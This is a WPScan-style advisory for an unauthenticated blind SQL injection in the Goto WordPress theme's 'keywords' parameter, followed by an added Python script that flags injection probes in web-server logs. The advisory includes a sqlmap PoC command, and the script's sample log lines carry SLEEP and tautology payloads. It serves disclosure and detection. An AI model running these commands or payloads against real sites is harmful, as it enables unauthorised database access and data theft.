Wpvulndb WPVDB-ID:1CC6DC17-B019-49DD-8149-C8BBA165EB30
Apr 26, 2021 - 12:00 a.m.

Goto < 2.1 - Unauthenticated Blind SQL Injection

2021-04-26 00:00:00
wpscan.com
EPSS: 0.003 (Low)
Percentile: 68.5%

The theme did not sanitise, validate or escape the keywords GET parameter from its listing page before using it in a SQL statement, leading to an unauthenticated SQL injection issue.

PoC

sqlmap --url="https://example.com/tour-list/?keywords=13&start_date=13" --random-agent --dbs --level=3 --threads=4 --dbms=MySQL -p keywords
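
A way to triage web-server access logs for probing of the `keywords` parameter described above, as an added example that is not part of the original advisory or of the theme's code. The log lines are constructed, and the function name `suspicious_keywords` and the token list are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed combined-format access-log lines; addresses, paths and values are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [26/Apr/2021:10:00:01 +0000] "GET /tour-list/?keywords=paris&start_date=13 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [26/Apr/2021:10:00:07 +0000] "GET /tour-list/?keywords=13%27%20AND%20SLEEP%285%29--%20-&start_date=13 HTTP/1.1" 200 5101 "-" "Mozilla/5.0"
203.0.113.9 - - [26/Apr/2021:10:00:09 +0000] "GET /tour-list/?keywords=13%20AND%201%3D1&start_date=13 HTTP/1.1" 200 5101 "-" "Mozilla/5.0"
198.51.100.2 - - [26/Apr/2021:10:01:00 +0000] "GET /blog/?keywords=select+a+tour HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Client address and request target of a GET request line.
REQUEST_RE = re.compile(r'^(\S+) .*?"GET (\S+) HTTP/[\d.]+"')

# Tokens with no place in a keyword search: quote characters, SQL comment
# markers, timing functions, UNION ... SELECT, and numeric tautology probes.
SUSPICIOUS_RE = re.compile(
    r"""['"`]|--|/\*|\b(?:sleep|benchmark)\s*\(|\bunion\b.+\bselect\b|\b(?:and|or)\b\s+\d+\s*=\s*\d+""",
    re.IGNORECASE,
)


def suspicious_keywords(log_text, param="keywords"):
    """Return (client_ip, decoded_value) for requests whose `param` value looks like SQL."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a GET request line in the expected format
        ip, target = m.groups()
        # parse_qs percent-decodes values and turns '+' into a space.
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for value in query.get(param, []):
            if SUSPICIOUS_RE.search(value):
                hits.append((ip, value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_keywords(SAMPLE_LOG):
        print(f"{ip}\t{value!r}")
```

The match is a triage heuristic: a legitimate search containing an apostrophe is also flagged, so hits need review against the client's other requests.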

CPE
Name    Operator    Version
goto    lt          2.1
